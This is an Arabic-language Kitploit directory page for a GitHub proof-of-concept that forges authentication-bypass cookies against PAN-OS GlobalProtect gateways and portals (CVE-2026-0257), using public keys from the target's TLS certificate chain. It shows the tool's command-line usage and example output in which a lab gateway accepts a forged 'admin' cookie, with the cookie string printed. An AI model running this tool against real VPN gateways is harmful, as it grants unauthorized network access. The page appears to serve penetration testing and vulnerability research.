Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-0257 — نص برهان المفهوم لاستغلال تجاوز المصادقة في PAN-OS GlobalProtect CVE-2026-0257 | Kitploit
أدوات/GitHubGitHub/sfewer-r7/cve-2026-0257
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةالفريق الأحمر
GitHubsfewer-r7/cve-2026-0257

CVE-2026-0257

نص برهان المفهوم لاستغلال تجاوز المصادقة في PAN-OS GlobalProtect CVE-2026-0257

عرض المستودع
26103منذ 3 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تزوير كوكي تجاوز المصادقة لـ GlobalProtect باستخدام المفتاح العام من TLS (CVE-2026-0257)

نص برهان مفهوم لاختبار بوابة GlobalProtect أو مدخلها في هدف PAN-OS لـ CVE-2026-0257. يحاول النص تزوير كوكي تجاوز مصادقة صالحة عن طريق التكرار على سلسلة الشهادات المستخدمة من قبل خدمة HTTPS، ولكل مفتاح عام في السلسلة، يتم تزوير كوكي تجاوز مصادقة جديد، واختباره ضد هدف GlobalProtect لمعرفة ما إذا كان صحيحًا.

ستسجل كوكي تم تزويرها بنجاح الدخول إلى هدف GlobaProtect وتسترد معلومات اتصال VPN (استخدم الوسيط --verbose للفحص).

الاستخدام

root@kitploit:~
$ python forge_cookie.py --help
usage: forge_cookie.py [-h] --target TARGET [--port PORT] [--user USER] [--domain DOMAIN] [--host-id HOST_ID]
                       [--client-os CLIENT_OS] [--client-ip CLIENT_IP] [--context {gateway,portal,both}] [--verbose]

تزوير كوكي تجاوز المصادقة لـ GlobalProtect باستخدام المفتاح العام من TLS (CVE-2026-0257).

options:
  -h, --help            عرض رسالة المساعدة هذه والخروج
  --target TARGET       هدف بوابة GlobalProtect أو مدخلها (IP أو اسم مضيف)
  --port PORT           المنفذ الهدف (الافتراضي: 443)
  --user USER           اسم المستخدم لتزوير الكوكي له (الافتراضي: admin)
  --domain DOMAIN       النطاق للكوكي (الافتراضي: فارغ)
  --host-id HOST_ID     معرف المضيف للكوكي (الافتراضي: فارغ)
  --client-os CLIENT_OS
                        نظام تشغيل العميل للكوكي (الافتراضي: Windows)
  --client-ip CLIENT_IP
                        عنوان IP للعميل في الكوكي (الافتراضي: 0.0.0.0)
  --context {gateway,portal,both}
                        السياق المراد اختباره: gateway، portal، أو both (الهدف الافتراضي)
  --verbose             طباعة الاستجابة الكاملة

مثال

root@kitploit:~
$ python forge_cookie.py --target 192.168.86.99
[*] Retrieving certificate chain from 192.168.86.99:443 ...
  Found 2 certificate(s) in chain:
  [0] CN=192.168.86.99 (RSA 2048 bits, CA=False)
  [1] CN=GP-Lab-CA (RSA 2048 bits, CA=True)

[*] Forging cookie for user 'admin', testing each key

  Trying [0] CN=192.168.86.99
  [-] Failure - Gateway did not accepted the forged cookie
  [-] Failure - Portal did not accepted the forged cookie

  Trying [1] CN=GP-Lab-CA
  [+] Success - Gateway accepted the forged cookie
  Cookie: bvUbfM5n5rWnZp8tp3AIE8Q/v9L7rJSgRb1suYHHBedwBrfUr4pItrluBYtQ3VtmkF0AYXw9hyipzrMC5qg0JO+ZHuZpHLIFNfhergPGRbLFBkRk9sriFMuGiRU1q3bBSF7PzxDn+0dy0+fG4Wf7u+JD4qQEcw+tIgp9UKv0IhyFY9XxwzYdrQucA8P9zKRkGiEQpFwD776mONJKnHZTe+R+D/wy49ATBWETuhD2NP+7dB2IeSfV2eGBiZWTJcLAxXpQHcKRImhTGKlw9o4Frw+RBVqh9aCXCQ4yLYuAviabWpV94Fhp/3aPVTrLDCOrbBilsu6Men9oOT3+b8Uw2g==
تنزيل الأداة